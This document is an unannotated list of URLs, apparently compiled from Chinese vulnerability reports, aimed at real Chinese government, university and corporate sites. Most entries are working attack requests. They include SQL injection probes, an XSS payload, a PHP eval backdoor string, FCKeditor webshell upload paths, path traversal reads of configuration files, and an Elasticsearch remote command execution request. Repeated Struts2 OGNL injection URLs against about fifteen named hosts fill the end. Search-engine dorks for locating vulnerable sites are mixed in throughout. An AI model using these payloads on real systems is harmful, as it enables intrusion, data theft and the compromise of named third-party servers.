http://www.czslj.gov.cn/WEBSYQ/index.asp?sys=7&local=1 http://www.qinyuancrm.com/login/forgetpswd.php?orgcode=1&loginname=dsdfsfds http://prm.ufida.com.cn/login/forgetpswd.php?orgcode=1&loginname=dsdfsfds http://yindajituan.gicp.net:8888 www.kdlian.com:8001 com:8080 cn:8080 cn:8080 com:8088 http://support.chanjet.com/ http://www.xxxx.com/manage/template.doc查看源码 http://www.xxxx.com/manage/template/findFileList.do?root=WEB-INF/t/cms http://www.xxxx.com/manage/1.jsp http://tuan.pps.tv/index.php?c=test&m=index_test&cat_id=6&city=an_shan&page=15 http://service.chanjet.com/Index.asp http://service.chanjet.com:80/DataBase/DB.mdb http://service.chanjet.com:80/database/db.mdb http://my.tv.sohu.com/us/214995546/69750893.shtml http://m.tv.sohu.com/us/214995546/69750893.shtml http://www.soso.com/websnapshot?ie=utf8&url=http%3A%2F%2Fwww.seo6.cn%2FNewsShow.aspx%3Fid%3D7079348f-1b5f-448e-be2e-1a28df7df2bc&did=a0ab67a1fc5e9a0c-a36050172c6735dd-ba7220240d88b7dd6f684e4a346e270f&k=30036050601571da0f37c8a9bb654106&encodedQuery=&query=http%3A%2F%2Fwww.seo6.cn%2FNewsShow.aspx%3Fid%3D7079348f-1b5f-448e-be2e-1a28df7df2bc&&pid=-s.idx.se&duppid=1&w=01020400&m=0&st=0 http://202.206.217.109/404.php/Modules/index/id/1*.html存在注入漏洞 http://202.206.217.109:8080/admin/public/login.html http://sns.web.maxthon.cn/browser/index.php?session_id=%27%22/%3E%3Cimg%20src=1%20onerror=alert%28%29%3Exsssqq:20A34CAFFB6E6C428C8DA3DAC8E06EF8&from=web.my http://extension.maxthon.cn/detail/index.php?view_id=1296 http://help.sundns.com/help/index.php?page=${@print%28eval%28$_POST[c]%29%29 http://zfw.sipac.gov.cn/Data/ModifyWorkInfo.aspx?WorkInfoType_id=5&action=add http://zfw.sipac.gov.cn/AttachedFile/ContentEmbedImg/20140528140125571195.aspx http://forum.wan.com http://jxjy.yangtzeu.edu.cn/ http://jxjy.yangtzeu.edu.cn/onews.asp?id=1434 http://jxjy.yangtzeu.edu.cn/onews.asp?id=1434 http://jxjy.yangtzeu.edu.cn/onews.asp?id=1434 http://210.73.66.91/usercenter/wafplatform/login/welcomelogin.action http://q1.sto.cn/reg/registerform http://q1.sto.cn/shoujireg/sendma?user_name=15000000000 http://hz.hnzj.edu.cn/ http://hz.hnzj.edu.cn/admin/login.aspx http://hz.hnzj.edu.cn/admin/index.aspx http://jw.bhcy.cn/ACTIONSHOWFILES.APPPROCESS?FolderID=201 http://jw.bhcy.cn/ACTIONDOWNLOADFILES.APPPROCESS?FolderID=102&mode=1&page=1&size=15 http://jw.bhcy.cn/ACTIONDOWNLOADFILES.APPPROCESS?FileID=182&FileName=/2012%BC%C6%CB%E3%BB%FA%B3%C9%BC%A8.xls http://jw.bhcy.cn/ http://zs.babybook.91.com/91_assistant_new/Detail.aspx?id=83HAZQJTNH1W2T4X&plat=&action=&platform=&imei=&fw= http://zs.babybook.91.com/91_assistant_new/list.aspx?type=83HELDBAI57O2GK0&plat=&action=&platform=&imei=&fw= ip:210.192.125.141:9200 http://113.142.29.107/weixin http://113.142.29.107/weixin/data/ http://113.142.29.107/weixin/data/config.php.wepartner http://113.142.29.107/weixin/data/sqls/ http://113.142.29.107/weixin/data/zhuanpan/9.txt http://calendar.hexun.com/Chart.aspx?ct=2&et=3 http://yytals.yonyou.com/web.rar http://mail.jn05.com/”试一试,结果可以访问,是一个SmarterMail企业版(至今没登陆进去) http://mail.hichina.com/” http://bbs.kuwo.cn/ www.anti-spam.org.cn IP:14.17.43.158 http://119.10.113.102:586/manage/login.asp http://119.10.113.102:8000/download_file.asp?FileName=caozuoshouce_040705.doc http://119.10.113.102:8000/ http://119.10.113.102:8000/admin/login.asp http://119.10.113.102:8000/download_file.asp?FileName=./../admin/login.asp http://61.139.66.70:8080/SignIn.aspx http://61.139.66.70:8080/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=%2F1.asp&NewFolderName=z&uuid=1244789975684 http://61.139.66.70:8080/fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=../../connectors/aspx/connector.aspx http://61.139.66.70:8080/Upload/FCKEditor/image/1.asp/112.jpg http://127.0.0.1/upload/?/admin/user_manage/user_save_ajax/ inurl:mafen.asp?shuxing= http://221.181.233.195:10003/index.asp?shuxing=%E9%A6%96%E9%A1%B5 http://221.181.233.195:10003/guanli.asp https://124.***.***.***/ http://edu.gd.chinamobile.com/selfopen.do?action=searchSchool&showradio=1&area_id=1&town_id=3183&school_name= http://www.txrsks.gov.cn/news_view.jsp?Nid=10 http://www.xzjxjy.com/news_view.jsp?Nid=10 http://jxjy.yzrsks.com/news_view.jsp?Nid=59 http://jxjy.harsks.com/news_view.jsp?Nid=10 http://jxjy.harsks.com/news_view.jsp?Nid=10 http://www.sqlmap.org http://124.***.***.***/sni/ http://jx10010.cn/ http://www.tcwmw.gov.cn/news_info.php?id=1000 http://ldap.nftz.gov.cn/~test/lad/client/read.php?id=1000 site:51cto.com site:51cto.com WWW.019029.COM http://auto.vojs.cn/uc_server/admin.php clsid:100C2765-1362-4CCF-AB02-56D916BB8732 http://www.khgj.gov.cn/khxgczxzl/read_1.php?id=568 http://wooyun.org/bugs/wooyun-2010-02750 http://59.39.88.214/ http://59.39.88.214/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=/asp.asp&NewFolderName=asp.asp http://59.39.88.214//fckeditor/editor/filemanager/browser/default/browser.html?Connector=%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx http://59.39.88.214/FCKEditor/upload/file/asp.asp/201405291852373593.jpg http://jpkt.whu.edu.cn/jpkc2003/ytysbx/DownloadShow.asp?ID=73 http://www.hukou.gov.cn:8088/zxft_read.asp?id=1 http://121.9.238.14:8080/login/ http://121.9.238.14:8080/invite/list http://xlzy.cuit.edu.cn/WebSite/HeartHealth/NewsList.aspx?PNodeNum=008804注入点 http://www.dggwbn.net.cn/msg/ port:9200” http://www.shodanhq.com/search?q=You+Know%2Cfor+search+country%3ACN+port%3A9200 inurl:newsList.jsp?ColumnCode= http://zfgjj.hanzhong.gov.cn/Website/newslist.jsp?ColumnCode=m0202 http://hzsgjj.com/Website/newslist.jsp?ColumnCode=m0101 http://www.lbszfgjj.org/Website/newslist.jsp?ColumnCode=m0201 http://www.jmszfgjj.com/Website/newslist.jsp?ColumnCode=m0202 http://www.rzgjj.com/Website/newslist.jsp?ColumnCode=m1401 http://182.139.134.42/ghzx/ http://wsms.lxdns.com/wsMS/monitorPic/list.do?action=main http://gz.chinasky.net:809 http://gz.chinasky.net:809/login.aspx http://www.lsjjj.gov.cn/info_Print.asp?ArticleID=807 http://philosophy.sysu.edu.cn/jdjsx/info_Print.asp?ArticleID=981 http://www.lsjjj.gov.cn/info_Print.asp?ArticleID=807 http://yjy.sjy.net.cn/Login.action http://www.ctvonline.cn/news.php?act=downloadpdf&mid=2的时候,mid参数存在注入漏洞,可获得管理员信息,后台上传过滤不严格,可以拿到webshell。 http://dlx.njit.edu.cn/index.php/Article/page/id/198.shtml http://dlx.njit.edu.cn:80/index.php/Article/page/id/198 http://ecb.gz.chinanetcenter.com/obs-helper/nav_intro.jsp.bak http://ecb.gz.chinanetcenter.com/obs/www/getDocument.do?doc=WEB-INF/web.xml&locale=zh_CN http://jk.chinamobile.com http://jk.chinamobile.com/cms/ http://it.sto.cn:8080/ cn:8080/lxb/login.php http://vi.iflytek.com/web-console/ http://vi.iflytek.com/jmx-console/ http://www.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%20@@version%3E0&keyword=2013 http://demo.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%20@@version%3E0&keyword=2013 http://www.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%02@@version%3E0&keyword=2013 http://demo.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%02@@version%3E0&keyword=2013 http://tuanwei.dlut.edu.cn/show.php?id=16453 http://cadcg.hfut.edu.cn/allurl114.php?id=201104210 http://passport.baidu.com/v2/?ucenterset http://www.baidu.com/p/setting/profile/proxy url:http://www.jackygame.com/news.php?id=19 http://wooyun.org/bugs/wooyun-2014-050715 http://xlzx.psych.ac.cn/newsdetail.php?id=696& http://wooyun.org/bugs/wooyun-2014-050715 http://203.110.164.95/t.php, inurl:/custom/GroupNewsList.aspx https://www.google.com.hk/webhp?hl=zh-CN&sourceid=cnhp#hl=zh-CN&newwindow=1&q=inurl:/custom/GroupNewsList.aspx&safe=strict&start=40 http://baike.baidu.com/view/5293437.htm?fr=aladdin http://bbs.goodbaby.com/_api/api.php?schema=get_m_hots&hours=168&limit=10&jsoncallback= www.wooyun.org/bugs/wooyun-2010-056625 http://caipiao.qingdaonews.com/new_msg.jsp?id=1749 http://116.113.179.98/ http://dir.minigame.qq.com/cgi-bin/dir_fetch_qqhead?imgtype=3&DomainID=207&callback=scn_sendInfo http://u.uzai.com http://www.233.com/search/GetCalendar/tongjilist_zq.asp?Act=zuotilist&num=2 http://www.233.com/search/GetCalendar/tongjilist_zq.asp?Act=zuotilist&num=2&ClassStr=1&jsoncallback= http://www.233.com/search/kaoshibaodian/detail.asp?en=ZC http://payload.moji002.com/skinpay/snsusermobile/isBindedMobile.action?SnsID=151 http://ugc.moji001.com/sns_attention/FansList?&SnsID=151&Start=0&Limit=50 http://manzhouli.gov.cn/zfwz/daj/list.asp?id=156 http://youth.cau.edu.cn/ATTACHMENT/download.php?filepath=./../setting.php http://yxxf.swu.edu.cn/download.php?file=./../includes/config_inc.php http://xwcbsy.ahu.edu.cn/ http://etc.ahu.edu.cn/ http://dqxy.ahu.edu.cn/ http://jjxy.ahu.edu.cn/ http://life.ahu.edu.cn/ http://mdsp.ahu.edu.cn/ http://mdsp.ahu.edu.cn/newsdetail.asp?id=34 http://www.cszh.gov.cn/manage/ http://whsz.gxu.edu.cn/index.php/Index/view?id=361 http://course.sdu.edu.cn/ http://course.sdu.edu.cn/Download/edf1ef6e-a9aa-49b7-8364-8b4dd35ea52b.asp http://payload.moji002.com/skinpay/snsuser/modifyPassword.action?SnsID=13260***&NewPassword=301752D1453E772C787DE1550E4712E9 http://ugc.moji001.com/sns_attention/FansList?&SnsID=151&Start=0&Limit=20 http://221.5.251.245/admin/index.jsp www.tsfnzw.gov.cn/site/down/ www.qaxzfw.gov.cn/site/down/downloadfile.jsp?name=web.xml&path=/WEB-INF/ http://www.qaxzfw.gov.cn/site/down/downloadfile.jsp?name=index.jsp&path=/site/down/ site:gov.cn inurl:downloadfile.jsp http://yx.1111.com/ http://www.inspur.com/langchao/search/download.do http://www.bilibili.tv/video/av973850/ http://www.bilibili.tv/m/stow?aid=973850&ajax=1&dopost=save&stow_target=stow&src=1.jpg http://interface.bilibili.cn/feedback/post?msg=By%E9%93%B6%E5%86%A5%E5%B8%81&aid=973850&action=send&src=1.jpg http://interface.bilibili.cn/feedback/agreement?mode=arc&aid=973850&rid=13838573&src=1.jpg http://oa.china-sss.com/defaultroot/public/editor/tpsc.jsp http://oa.china-sss.com/defaultroot/public/editor/js/up_images/2014053116155025567481452.jsp http://manhua.7k7k.com/ http://zheye.cc/reset_password/后面的部分是一个数字加上邮箱号。 inurl:/ycportal http://目标站点/ycportal/js/wbTextBox/showimg.jsp?jumpPage=1&url=/ http://目标站点/ycportal/js/wbTextBox/uploadfile.jsp?blockid=1000 http://www.jztobacco.com.cn/ http://www.rzdonggang.gov.cn/ http://www.jxfdacdc.cn/ http://www.lvlyc.com.cn/ http://ci.cnu.edu.cn/Article.aspx?ID=130004019001805000 http://gl.szairport.com/gjlxs/award.jsp?jplx=1004710 URL:http://www.ggbb.gov.cn/admin/login.php http://ugc.moji001.com/mapi/ResetPasswordBefore?E268443E43D93DAB7EBEF303BBE9642F={{****}}&07CC694B9B3FC636710FA08B6922C42B=[[31343031343334363738363430]]&lan=CH http://ipv6.upc.edu.cn/ http://market.chanjet.com/index.php/Login/index http://www.njmuseum.com/HistoryEventList.aspx?menuid=3a42129e-e005-49b4-b88c-6df94b4bc873 http://chatservice.352.com/plugins/blossom/messagelog/searchMessageLog.do?callback= www.352.com/communication/download.do?path=/data/blossom/uploadfiles/member/ http://219.239.97.51/chinacc/search2.asp?ClassID=&Field=&Keyword=1%27%22&page=2 http://219.239.97.51:80/chinacc/search2.asp?ClassID=&Field=&Keyword=1&page=2 http://www.zoheng.net/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞。 inurl:news_display.php http://cloud.189.cn/u/xxx http://cloud.189.cn/u/1 http://api.stage.smartlionapp.com/ http://yqjyj.gov.cn/admin.php http://mis.gtxy.cn/xsgzgl http://www.scgyjt.gov.cn/zxft/ft/1/admin/login.asp http://www.scgyjt.gov.cn/zxft/ft/1/ http://web1.psych.ac.cn/admin/MakeTopictoHTML.php?channelID=22 inurl:ShowNewsPageAction.do?newsID= http://www.gu.zjut.edu.cn/ShowNewsPageAction.do?newsID=3824 http://www.sqlmap.org www.gu.zjut.edu.cn\session http://erp.laipin.com/admin/page!login.action http://www.sce.tsinghua.edu.cn/news/detail.jsp?id1=2054 http://www.sce.tsinghua.edu.cn/sceadmin/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../ www.sce.tsinghua.edu.cn http://szxc.gdcct.gov.cn/article.php?country_id=807&id=11340&lm=news http://www.urpsoft.com/index.jsp)开发的高校系统多用于就业网,其中某处(detail.jsp?seq=)存在通用型SQL注入漏洞,涉及的学校包括首都师范大学、浙江大学、清华大学、中央民族大学等多个就业信息网。导致可以使数据库信息泄漏。 http://**.**.**/jyw/detail.jspseq=3932_ http://**.**.**/jyw/detail.jspseq=1967_ http://**.**.**/jyw_zc/detail.jspseq=2222_ http://**.**.**/jyw_new/detail.jspseq=1873_ http://**.**.**/jyw_old/detail.jspseq=1788 http://sjic.hust.edu.cn/wp-login.php http://218.106.133.143:80/ITindex.asp https://kyfw.12306.cn/otn/forgetPassword/initforgetMyPassword http://211.68.68.197/opac_two/search2/s_detail.jsp?sid=01h0279576 http://www.bcrj.com.cn/ http://dir.minigame.qq.com/cgi-bin/dir_fetch_qqhead/get_player_info?callback=success_jsonpCallback1&uin=&_=1401588334716 http://dir.minigame.qq.com/cgi-bin/dir_fetch_qqhead/get_player_info?callback=success_jsonpCallback1&uin=&_=1401588334716 http://www.wyn88.com/user/login.html inurl:ws2004 http://WEBSITE/ws2004/sysManage/Resource/add/addResource.asp?FunID=192 http://WEBSITE/ws2004/sysManage/Resource/add/addResource.asp?FunID=192 http://www.fzjcxx.cn/ http://lnjpgz.com/ http://www.cgyz.net.cn/ http://www.yygy.net/ http://www.sdjnzx.com/ http://www.zjk2z.cn/ http://www.sdjnzx.com/ http://www.hwsyxx.com/ http://sgtjb.com/ http://www.tadyzx.com/ http://www.gzsjx.cn/ http://www.yygy.net/ http://www.sdjnzx.com/ http://www.zjgzjzx.cn/ http://www.hn26z.com/ http://www.wuai.lwedu.sh.cn/ http://www.yzsx.net.cn/ http://ms.baihe.com/send?toid=76690391 http://wistone.com/news.php?year=2013 http://wooyun.org/bugs/wooyun-2014-057374 http://wooyun.org/bugs/wooyun-2014-057319 http://xgxy.cug.edu.cn/wp-admin/ http://www.hk603.com/downLoad.php?path=./../admintool/DB_config.php http://cee.gov.cn/UploadFile/ http://eii.jlu.edu.cn/guanli/ http://eii.jlu.edu.cn/guanli/update_dongtai.php?id=1016 http://home.focus.cn/newscenter/videonew/videoshow.php?id=41020 http://ohhmystyle.com/phpinfo.php http://ohhmystyle.com/product.php?productid=23794 http://222.184.79.39:88/admin/index.asp intext:megasoft http://www.189dw.com:8081为例 http://www.xxx.com:8081/common/jsp/file.jsp http://www.189dw.com:8081/positionmap.mapemployee.do?stimeid=0.4427834945057538&positionmap_smobile=手机号码~ http://www.189dw.com:8081/positionmap.newsms.do?ui_key=positionmap-sendsms-pop&ui_tokey=&ui_tohref=%2Fpositionmap.no.do%3F&ui_toform=&positionmap_smobile=手机号@&手机号@ http://219.239.97.51/en/tt12.asp?ClassID=74&page=81&SpecialID= http://app.easou.com/cat.e?key=%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8&sortMode=1&l=$pl1&esid=QghUYDj8ostpvy&wver=ta&fr=148 http://data.flurry.com/aap.do http://house.focus.cn/reviewhouse/review_forum_detail.php?user_id=48299521 http://sh.focus.cn/entrance.php?m=common/private/modules/admin/controllers&c=admin_manage&a=public_init http://www1.nuc.edu.cn/jwc/eWebEditor/ http://www1.nuc.edu.cn/jwc/eWebEditor/ http://www.cr20gf.com/qn/InfoQingchun_news.asp?id=21 http://www.cr20gf.com/qn/system/login.asp http://www.tehang.com/articlelist.aspx?cid=4 http://www.aipu114.com/ http://tv.sohu.com/vip/ http://zhuanlan.zhihu.com/wooyun/19760786 http://www.gzgwbn.com.cn/ http://tw.cr15g.com/CN/DeptInfo.aspx?&DeptId=1 http://www.zt163.cn/tradesshow.php?pid=276 http://www.baidu.com/s?wd=inurl%3Aid%20%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E4%B8%89%E4%BB%A5%E7%BD%91%E7%BB%9C&pn=0&oq=inurl%3Aid%20%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E4%B8%89%E4%BB%A5%E7%BD%91%E7%BB%9C&tn=91553692_hao_pg&ie=utf-8 http://www.crssg.com/ppryshow.php?list=348 http://m.nuomi.com/ inurl:spdt_listSp.action http://www.stzwzx.com/spdt/spdt_listSp.action?deptId=009574019&menu=4 http://idcht.com/newsshow1.php?id=38 http://signin.fj.vnet.cn/login.aspx http://www.wuyixz.gov.cn/site/services/searchresult.jsp?key=6yMOeKnq&type=0 http://www.google.de/#newwindow=1&q=inurl:site%2Fabout%2Findex.jsp%3Fid%3D http://www.google.de/#newwindow=1&q=inurl:site%2Fabout%2Findex.jsp%3Fid%3D http://www.wuyixz.gov.cn/site/consult/showgzpy.jsp?act=docreate&deptid=y2qXdGBO&deptname=&star= http://www.instrument.com.cn/ask/MyAskList.aspx?usernaem=hstudent&type=1 http://www.siteserver.cn/case/54.html http://cms.demo.siteyun.cn/siteserver/login.aspx http://www.minjiao.com/ http://www.minjiao.com/html/anli/anlis/ http://web.ptjy.com/web/web_programs_dotnet/member/ http://www.zzyxjy.com/Web/Web_Programs_DotNet/Member/ http://school.mwedu.gov.cn/web/web_programs_dotnet/Member/ http://school.gledu.gov.cn/web/web_programs_dotnet/Member/ http://school.zzlwjy.com/web/web_programs_dotnet/member/ http://school.fjhajy.net/web/web_programs_dotnet/member/ http://schoolweb.ctjy.net/web/web_programs_dotnet/member/ http://school.fjjyjy.net/web/web_programs_dotnet/member/ http://www.ptedu.gov.cn/web/web_programs_dotnet/member/ www.qledu.gov.cn/web/web_programs_dotnet/Member/ http://web.ptjy.com/web/web_programs_dotnet/member/ http://web.ptjy.com/web/web_programs_dotnet/member/Default.aspx http://www.gdmc.edu.cn/news/view.php?id=12490 http://heyuan.gdrtvu.edu.cn/netstudy/login.asp http://api2.sfbest.com/icbc/pay.php?orderId=1406029521835410&type= http://hbzxpx.ec.com.cn/logout.action http://202.119.189.236:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436%20%20 http://www.cccyjc.com/News_Detail.asp?News_BigClass_ID=5&News_SmallClass_ID=25&News_ID=61 http://219.243.47.169:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\nimport%20java.io.*;\nString%20str%20=%20\%22\%22;BufferedReader%20br%20=%20new%20BufferedReader%28new%20InputStreamReader%28Runtime.getRuntime%28%29.exec%28\%22uname%20-a\%22%29.getInputStream%28%29%29%29;StringBuilder%20sb%20=%20new%20StringBuilder%28%29;while%28%28str=br.readLine%28%29%29!=null%29{sb.append%28str%29;}sb.toString%28%29;%22 http://down.sj.2144.cn/sj/20140408/PlumberCrack_142301.apk?100&p=Android&f_name=&ext=apk&fitto=Android%20Android2.2%E5%8F%8A%E4%BB%A5%E4%B8%8A%E4%BB%A5%E4%B8%8A&f_id=-1139637542 http://qhdimg.focus.cn/common/app/include/configs/1.php http://u.uzai.com/mobile/register http://bh.2144.cn/news?action=index&id=6 http://bh.2144.cn/news?action=index&id=6&page=2 http://bh.2144.cn/gl?action=index&id=2 http://bh.2144.cn/gl?action=index&id=2&page=2 http://www.dascomsoft.com/website/index.aspx inurl:portalView.do?menuNavKey http://zy.ybzj.com:8080/suite/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://219.220.176.101/suite/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://zyzx.trzy.cn:8077/suite/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://xqdg.gdgm.edu.cn/suite/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://210.36.158.170/suite/sperc/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://222.180.192.2:8901/suite/skills/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://zxxx.czmec.cn:8080/suite/skills/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://suite.yxgcx.com/suite/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://61.191.23.103:8009/suite/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://116.252.173.100:9080/skills/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://jpkc.gdcp.cn/skills/sperc/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://218.4.60.155/skills/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://114.242.94.168/suite/jpkc/portalView.dohttp://218.4.60.155/skills/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://125.222.104.50/suite/portal/portalView.do?siteKey=0&redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://zypt.lnpc.edu.cn/suite/portal/portalView.do?siteKey=0&redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://202.109.191.9/skills/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D 